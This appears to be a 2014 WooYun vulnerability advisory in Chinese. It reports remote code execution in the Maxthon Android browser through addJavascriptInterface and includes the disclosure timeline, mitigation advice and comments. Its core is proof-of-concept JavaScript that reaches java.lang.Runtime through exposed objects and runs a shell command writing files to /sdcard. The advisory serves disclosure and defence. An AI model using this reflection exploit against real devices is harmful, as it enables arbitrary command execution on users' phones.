当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059124

漏洞标题:傲游安卓浏览器最新版还可以远程代码执行(包括平板版本)

相关厂商:傲游

漏洞作者: 学习乌云

提交时间:2014-05-02 12:42

修复时间:2014-07-28 12:44

公开时间:2014-07-28 12:44

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-02: 细节已通知厂商并且等待厂商处理中
2014-05-07: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-01: 细节向核心白帽子及相关领域专家公开
2014-07-11: 细节向普通白帽子公开
2014-07-21: 细节向实习白帽子公开
2014-07-28: 细节向公众公开

简要描述:

问题大家估计都能猜到。可时隔半年,傲游安卓浏览器最新版还可以远程代码执行。平板版也有问题,就不分开报了。5月1号最新测试官方版。

详细说明:

之前这边报过 WooYun: 傲游云手机浏览器远程命令执行漏洞 addJavascriptInterface的问题
我用腾讯和之前这个人代码改了个攻击代码,远程显示和把暴露的对象写入文件。
下面是主要的代码部分。

if ("getClass" in window[obj]) {
try{
window[obj].getClass();
res_js = res_js + obj + "<br/>";
res = res + 1;
execute(window[obj], ["/system/bin/sh","-c","echo 'output one object called "+obj+"' > /sdcard/"+obj+".txt"]);
}catch(e){
}
}
function execute(obj, cmdArgs)
{
return obj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}

漏洞证明:

暴露的对象

1.jpg


远程写入的文件,证明确实可以远程代码执行。

2.jpg

修复方案:

1. 尽量不用addJavascriptInterface,可以用Android JS event机制来做。
2. 限定特定域名才可以用
3. 自己加个过滤的库来屏蔽,如果实在要用

版权声明:转载请注明来源 学习乌云@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-28 12:44

厂商回复:

最新状态:

2014-05-15:旧漏洞. 同 http://www.wooyun.org/bugs/wooyun-2014-050031


漏洞评价:

评论

  1. 2014-05-16 17:09 | 学习乌云 ( 实习白帽子 | Rank:95 漏洞数:14 | 学习ing...)

    过了大半年还没修复,是啥节奏呢? @xsser

  2. 2014-09-25 15:15 | Guardian ( 实习白帽子 | Rank:96 漏洞数:20 | I'm from the Internet and be here to hel...)

    之前也报了一个这样的,直接忽略~

  3. 2014-10-30 19:17 | abaddon ( 实习白帽子 | Rank:37 漏洞数:8 | 我叫什么名字)

    不管怎么说 值得学习在360恶搞了各 不知道能搞笑起来不

  4. 2014-10-30 19:31 | abaddon ( 实习白帽子 | Rank:37 漏洞数:8 | 我叫什么名字)

    原来浏览器远程执行是这么回事 点下感谢分享